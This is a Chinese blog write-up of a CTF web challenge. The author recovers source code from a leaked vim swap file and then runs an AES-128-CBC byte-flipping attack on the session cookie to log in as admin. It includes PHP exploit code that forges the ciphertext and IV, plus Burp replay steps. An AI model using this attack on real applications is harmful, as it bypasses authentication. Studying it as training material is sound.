ctf-web-CBC

于 2022-05-11 01:09:54 发布
阅读量486 收藏 1
点赞数 1
分类专栏: ctf 文章标签: 安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/god_001/article/details/124693717
版权

题目:跳转提示

打开链接,发现是一个登录页面:

尝试输入用户名admin,密码123,发现显示:

于是修改用户名为admin1,密码123,显示:

 猜测可能需要绕过一开始对用户名admin的过滤,使用dirsearch扫描网址:

 发现一个swp文件,这是当使用vim或vi编辑文件出现错误时会产生的一个交换文件,可以用来恢复原文件,使用命令

vim -r index.php.swp

可以得到源代码内容:

 

 分析代码,发现改网站使用的是aes-128-cbc加密,结合题目猜测是利用CBC字节翻转攻击,使得输入的用户名不是admin,但对密文CBC解码后的用户名为admin

发现可以分为三步:

第一步:修改cipher

输入用户名:admim,密码:123456789,查看COOKIE得到对应cipher='%2BHKS%2BZEHVyQiVB83AZ%2FOj5sWmeXNiwOXapneD51cm%2BSSvwuAKjNADOKCZLmrCaz2%2BnAgpthIWr%2FijxluMdbZGd7Bwbfm%2FngwXPAW9v04qFs%3D'和iv='3kjDiNVRjmeYbKzNlqYD0A%3D%3D'

(这一步是为了得到ciphertext和iv,同时也是为了使得session['username']存在)

因为网站加密使用了aes-128-cbc加密,这是一种分组加密,因此将密文分为5组(5*128bit=5*16byte),同理,根据源代码可知,明文M=a:2:{s:8:"username";s:5:"admim";s:8:"password";s:9:"123456789";},可以分成四组(4*16byte):

array(4) { 
[1]=> string(16) "a:2:{s:8:"userna" 
[2]=> string(16) "me";s:5:"admim";" 
[3]=> string(16) "s:8:"password";s"
[4]=> string(16) ":9:"123456789";}" 
}

利用CBC字节翻转攻击CBC字节反转攻击原理_w0s1np的博客-CSDN博客_cbc字节翻转攻击可以通过修改第一组密文来篡改其通过其解密出的第二组明文,使得admim变为admin

<?php
$iv=base64_decode(urldecode('3kjDiNVRjmeYbKzNlqYD0A%3D%3D'));
$cipher=urldecode('%2BHKS%2BZEHVyQiVB83AZ%2FOj5sWmeXNiwOXapneD51cm%2BSSvwuAKjNADOKCZLmrCaz2%2BnAgpthIWr%2FijxluMdbZGd7Bwbfm%2FngwXPAW9v04qFs%3D');
$cip=base64_decode($cipher);
$c=array("username"=>"admim","password"=>"123456789");
$cc=serialize($c);
for($i=1;$i<=5;$i++){//原CBC密文分为5组(5*16)
	$j=$i-1;
	$cip_part[$i]=substr($cip,$j*16,16);
}
for($i=1;$i<=4;$i++){//明文分组(4*16)
	$j=$i-1;
	$M_part[$i]=substr($cc,$j*16,16);
}
$temp=$M_part[2]^$cip_part[1];//原第二组密文aes解密后的内容
$cip_new_part[1]=$cip_part[1];
$cip_new_part[1][13]=$temp[13]^"n";
//echo $cip_new_part[1]^$temp;//得到新的第一组密文,可以使得得到的明文中由admim转为admin
$newc=$cip_new_part[1].$cip_part[2].$cip_part[3].$cip_part[4].$cip_part[5];
$newc=urlencode(base64_encode($newc));
echo $newc;
?>

已知,只是这样变换,虽然可以达到第二组密文解码得到me";s:5:"admin";,但是因为改变了第一组密文的内容,会使其解码得到的第一组明文发生错误,若要得到想要的明文,就需要修改iv

第二步:修改iv

要如何修改iv,需要知道修改后的密文解码后的结果,通过源代码文件可以看出,在check_login()函数中,如果解码得到的明文无法反序列化,就会返回解码的base64加密内容

bp抓包,删除POST参数,修改COOKIE内容,使得iv不变,cipher变为第一步修改后的cipher

repeater后,得到结果:

 这段base64加密值就是想要得到的内容

 果然第一段明文发生了变化,通过将想要得到的第一组明文与修改后的第一组密文aes解密后的内容异或,就可以得到符合的iv

$x=base64_decode('DTrOn+3+6RAjCCAiZwMdEm1lIjtzOjU6ImFkbWluIjtzOjg6InBhc3N3b3JkIjtzOjk6IjEyMzQ1Njc4OSI7fQ==');//修改过第一组密文后得到的明文
//echo $x;//发现第一组明文乱码,但第二组用户名已经成功改变
$newM=substr($x,0,16);
$temp=$iv^$newM;//得到原第一组修改后的密文aes解密后的内容
$new_iv=$temp^$M_part[1];
$new_iv=urlencode(base64_encode($new_iv));
echo $new_iv;

得到结果

 第三步:repeater修改后的cipher和iv

bp抓包,删除POST参数,修改COOKIE内容,使得cipher变为修改后的cipher,iv变为修改后的iv,重发请求,得到结果:

 

 (太菜了,前后开了两次靶机)

榴莲 蛋挞
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CBC翻转攻击,来自一道CTF题的学习大礼包
HotIce0
11-12 3595
一、背景 最近报名参加了一个CTF比赛,学长介绍了个网站,实验吧。开始了做题之旅。说句实话,网站还行,就是那个假设题目的服务器不太行。老是出现无响应的情况。 遇到一个题目名称为简单的登录题的问题 二、题目分析流程 题目 格式:flag:{xxx} 解题链接: http://ctf5.shiyanbar.com/web/jiandan/index.php 做这种题目的思维习惯: 如果是get请求...
Bugku WEB CBC
qq_41696858的博客
07-28 336
这题考的是CBC分组加密攻击,反正dirsearch先扫一波,index.php.swp 然后就vim -r index.php.swp查看源码 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <meta http-equiv="Content-
CTF-web Xman-2018 第二天 CBC加密简单介绍
iamsongyu的博客
12-01 1176
Padding oracle attack 这是一个分块的加密算法,当前块的加密依靠前一个块的加密结果,形式如下图: 可以看出,为了满足当前与前一块的规则,它初始化了一个向量V,用于第一轮加密。 将分组的明文与上一组的密文进行计算得到该组的密文,继续做下一组的【V向量】(V就是指初始给的,这里这么多就是形象一下)。 我们需要提醒的是,对于分组过程中会出现数据长度不足的情况,那么我们为了...
CBC翻转攻击与实验吧CTF例题:简单的登录题
qq_39228620的博客
06-05 1322
CBC翻转攻击原理: 我认为,要更好更快的理解CBC翻转攻击,它的原理和必要的密码学知识是必不可少的。 所以我们从密文的加密与解密说起: 下图是 密文加密过程: vi:是用于随机化加密的比特块,用来保证即使对相同明文多次加密,也可以得到不同的密文。 key和加密函数:因为我们不需要用到它们,所以这里不解释,免得浪费大家时间。有想一探究竟的童鞋可以去学习AES加密。 我们文字描述一边流程,相信会好理...
[CTF]AES-CBC字节翻转攻击
V1040375575的博客
12-27 5402
文章目录前言一、AES-CBC二、攻击步骤1.对于解密时:2.字节翻转3.修复IV:三、CTF实例题 前言 [CTF] AES-CBC字节翻转攻击 一、AES-CBC 加密过程: Plaintext:明文数据 IV:初始向量 Key:分组加密使用的密钥 Ciphertext:密文数据 明文都是先与混淆数据(第一组是与IV,之后都是与前一组的密文)进行异或,再执行分组加密的。 1、首先将明文分组(常见的以16字节为一组),位数不足的使用特殊字符填充。 2、生成一个随机的初始化向量(IV)和一个密钥。
ctf-web网络安全课程视频.zip
10-19
网盘文件永久链接 1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
CTF-web学习大纲
01-30
CTF-web学习大纲
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
CTF-WEB[GXYCTF 2019]BabyUpload
02-08
CTF-WEB[GXYCTF 2019]BabyUpload
CBC字节反转攻击.pdf
11-17
深入理解密码学中CBC模式模式下的加解密过程及其存在的问题。并用一道CTF经典例题深入讲解字节反转攻击。
CTF-Web1-(涉及cbc字节翻转攻击,难度大)
→_→
07-04 2481
实验吧平台维护到现在一直都还没维护好,我的好多松果都凉凉了,现在到了暑假特意把以前做过的题翻来重新写成博客,主要的目的是为了学习做题的思路,当然还有的题当时不会做,也不懂原理,经过一年多的学习,也了解了一些,所以就特意写写加强记忆。实践才是真理!(唯一可惜的是没有原题环境练习了) 1.简单的的登录题 当时,这一题看标题以为是很简单的SQL注入啥的,结果看到50的分值,通过率只有15%,可见其难度之高,所以这里就参考别人的思路来展示: 作者:pcat 1.做题的初步收集、整理 i.
Crypto日记之AES-CBC bit翻转攻击
zgzhzywzd的博客
03-15 6942
0x01 前言 攻防世界刷题遇到了一道AES-CBC 字节翻转攻击的题目。 0x02 题目CISCN-2018-Quals-intersting 下载附件得到了两个文档,一个python脚本和一个heheda.txt的文档,python脚本如下: import flag import hashlib from Crypto.Util.number import getPrime, long_to_bytes, bytes_to_long from Crypto.Cipher import AES
AES-128-CBC加解密/openssl_decrypt
mollygogo的博客
01-18 4208
针对phpAES-128-CBC加解密代码,需要使用JAVA解密。 1. php加解密 //加密 $result = openssl_encrypt($data, "AES-128-CBC", $aesKey, 0, $aesIv); //解密 $result = openssl_decrypt($data, "AES-128-CBC", $aesKey, 0, $aesIv); 需要注意$options变量的不同。 加密过程中的$options=1, 意味着使用OPENSSL_RAW_
实验吧 简单的登录题 CBC字节翻转攻击
include_heqile的博客
04-15 5307
本文CBC脚本部分参考了:http://hebin.me/2018/01/26/西普ctf-简单的登录题/ 首先对这道题进行了抓包 在抓包的时候,看到了这个: 直接在浏览器地址栏中输入URL:http://ctf5.shiyanbar.com/web/jiandan/test.php 将代码粘贴到编辑器中,格式化代码: &amp;lt;?php define(&quot;SECRET_KEY&quot;...
CBC字节反转攻击
jeffreynnn的博客
08-11 4919
0x01 题目来源https://github.com/pbiernat/BlackBox/tree/master/FL!P 下载后可以本地进行做题。0x02 解题思路1、首先看到 CBC的解密模式这里可以看到在CBC解密的时候,是将密文分组为16字节的块,将前一组密文与后一组密文解密后的分组进行异或,从而得到最终的明文。2、查看源码 发现,在判断用户输入的时候,是不能在字符串中出现“;”的,但
cbc字节翻转攻击
Xi4or0uji
09-19 1306
本来很久之前就应该把它学了,但是不能静下心看完,拖到现在......... 今天上课的时候跟cg一起看,抱着神仙的大腿将它看完了,cg牛逼!! 首先我们先看下他的加密过程 可以看到,它先将明文进行分块,第一块与初始变量异或,然后秘钥进行加密,得到的密文再与第二块明文进行异或,继续秘钥加密,以此类推,加密过程有个最显著的特点就是:前一个密文用来产生后一个密文 接下来是解密的过程,其实懂了...
CBC字节反转攻击详解
qq_45698157的博客
11-17 4586
前言 CBC全称为密码分组链接模式。不同于ECB模式,在CBC模式中,每个明文块先与前一个密文块儿进行异或后,在进行加密。这种加密模式很好的隐藏了明文的统计特性,但是同样也暴露出了一个很严重的缺点。本文将针对CBC模式的特点,详细讲解字节反转攻击的原理及应用。 一、CBC加密模式 Plaintext:明文 IV:初始化向量 Ciphertext:加密后的数据 Key:密钥 加密过程转化成文字来叙述: 先将Plaintext分组(常见以16字节为一组) 生成初始化向量IV和密钥K
CTF密码学常见加密解密总结
热门推荐
qq_40837276的博客
05-17 4万+
CTF密码学常见加密解密总结 被实验吧一堆大佬出题人折磨的死去活来的我,嘤嘤嘤。在此做个总结,防止自己忘掉: Escape加密/UnEscape解密 JavaScript unescape() 函数可对通过 escape() 编码的字符串,找到形式为 %xx 和 %uxxxx 的字符序列(x 表示十六进制的数字),用 Unicode 字符 \u00xx 和 \uxxxx 替换这样的字符序列进行解码...
ctf-qsnctf此地无银三百
最新发布
02-20
ctf-qsnctf是一个CTF(Capture The Flag)比赛平台,它提供了一系列的网络安全挑战,旨在帮助参与者提升网络安全技能和解决问题的能力。在ctf-qsnctf平台上,参与者可以通过解决各种类型的题目来获取旗帜(flag),...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

榴莲 蛋挞

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值